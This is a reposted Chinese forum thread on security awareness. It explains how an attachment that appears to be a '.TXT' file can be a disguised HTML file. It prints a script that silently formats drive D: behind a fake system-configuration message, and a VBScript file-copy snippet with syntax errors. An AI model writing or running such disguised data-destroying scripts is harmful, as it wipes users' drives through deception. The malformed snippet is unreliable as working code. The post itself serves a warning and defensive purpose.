【轉貼】淺談TXT文件的安全性

顯示結果從第 1 筆 到 3 筆,共計 3 筆
  1. #1
    會員
    註冊日期
    2001-04-02
    討論區文章
    60

    【轉貼】淺談TXT文件的安全性

    大家都知道,現在大多數病毒的傳播媒介都是可執行文件或腳本文件,但當你收到一分附件為.TXT為後綴名的郵件時,你會不會有所警覺呢?在一定程度上也可以造成破壞!由於目前大多數人使用的是Windows系列的操作系統,而Windows設置是隱藏已知文件擴展名的。當你點擊那個看上去很友善的文件時,那些破壞性的東西就會一一跳了出來。
    假如你收到一分郵件,附件裡的文件名為「美媚大放送.TXT」,你是不是會認定他肯定是純文本文件呢?那可不一定哦!它的實際文件名可以是「美媚大放送.TXT.{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}」。其中的「{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}」在註冊表裡的含義是HTML文件關聯。但是存成文件時它就不會顯現出來,你看到的這個.TXT文件其實就是「美媚大放送.TXT.HTML」。那麼打開這個文件又會有什麼危害呢?如果這個文件的內容如下(警告:以下代碼可能帶有攻擊性,禁止亂用,一切使用後過自負!):

    ----------------------------------------------------------
    〈script〉
    a=new ActiveXObject("WSCript.Shell");
    a.run("format.com D:/q /autotest /u");
    alert("Windows is configuring the system. Please do not interrupt this process.");
    〈/script〉
    ----------------------------------------------------------
    那麼它就會調用IE運行FORMAT命令,同時顯示「Windows is configuring the system. Please do not interrupt this process.」,呵呵,這下你可就慘了。。。要注意哦~
    大家大概已經注意到第二行的「WSCript」了吧,對啊,就是它在導演著這場戲。
    WSCript全稱「Windows Scripting Host」,它是Windows 98新增的功能,是一種批次語言/自動執行工具——它所對應的程序「WSCript.exe」是一個腳本語言解釋器,為於WINDOWS目錄下,正是它才使得腳本可以被執行,就像執行批處理一樣。在Windows Scripting Host腳本環境裡,預定義了一些對像,通過它自帶的幾個對像,可以實現獲取環境變量、創建快捷方式、加載程序、讀寫註冊表等功能。
    下面我們通過一個小的例子來說明WSCript的功能是如何的強大,而使用又是何等的簡單,被人利用的威脅有是如何之大。例如有一個.vbs文件:

    Set so=CreatObject(Scripting.FileSystemObject")
    so.GetFile(c:\Windows\winipcfg.exe).Copy("e:\winipcfg.exe")

    這麼短短的兩行就可以COPY一個文件到指定位置。第一行:創建一個文件系統對像;第二行:打開腳本文件,c:\Windows\winipcfg.exe指明這個程序本身,是一個完整的路徑文件名。GetFile函數獲得這個文件,Copy函數將這個文件複製到E盤根目錄下。這也是現今大多數利用VBscript編寫的病毒的一個特點。由此可以看出禁止FileSystemObject對象就可以有效地控制這種病毒的傳播。禁止FileSystemObject對像可用如下命令:

    regsvr32 scrrun.dll /u

    [從別的論壇看到的,分享給大家]



  2. #2
    會員
    註冊日期
    2001-10-06
    討論區文章
    14
    謝謝您的分享, 又懂了一些.

  3. #3
    九一六三 iwjyiyh 的大頭照
    註冊日期
    2001-06-02
    討論區文章
    608
    謝謝你我又學一招!

類似的主題

  1. 【轉貼】PROXY代理服務器 使用安全性檢討
    作者:tthung 所在討論版:---- ADSL 軟 硬 體 技 術
    回覆: 1
    最後發表: 2002-12-25, 05:36 PM
  2. word文件的圖示怎麼改
    作者:Billson 所在討論版:-- OFFICE 相 關 軟 體 討 論 版
    回覆: 2
    最後發表: 2002-02-26, 01:37 PM
  3. [推薦] Visual CHM 制作CHM文件的工具
    作者:iget 所在討論版:-- 網 路 軟 體 討 論 二 版 (網路其他軟體)
    回覆: 0
    最後發表: 2002-02-03, 11:46 AM
  4. 修復RM文件的小軟件
    作者:god_wong 所在討論版:-- 多 媒 體 討 論 版
    回覆: 0
    最後發表: 2001-10-22, 08:56 AM

 

此網頁沒有從搜尋引擎而來的訪客

發表文章規則

  • 不可以發表新主題
  • 不可以回覆文章
  • 不可以上傳附加檔案
  • 不可以編輯自己的文章
  •